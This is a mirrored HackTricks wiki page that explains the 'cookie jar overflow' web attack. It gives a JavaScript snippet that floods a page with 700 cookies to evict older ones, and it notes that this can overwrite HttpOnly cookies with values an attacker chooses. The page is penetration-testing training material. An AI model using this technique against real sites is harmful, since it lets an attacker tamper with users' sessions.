maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
carlospolop 827e6354da fix some titles
2025-07-08 13:28:53 +02:00

30 lines
1004 B
Markdown
Raw Blame History

# Cookie Jar Overflow
{{#include ../../banners/hacktricks-training.md}}
The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some reason you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Notice, that third party cookies pointing to a different domain won't be overwritten.
> [!CAUTION]
> This attack can also be used to **overwrite HttpOnly cookies as you can delete it and then reset it with the value you want**.
>
> Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink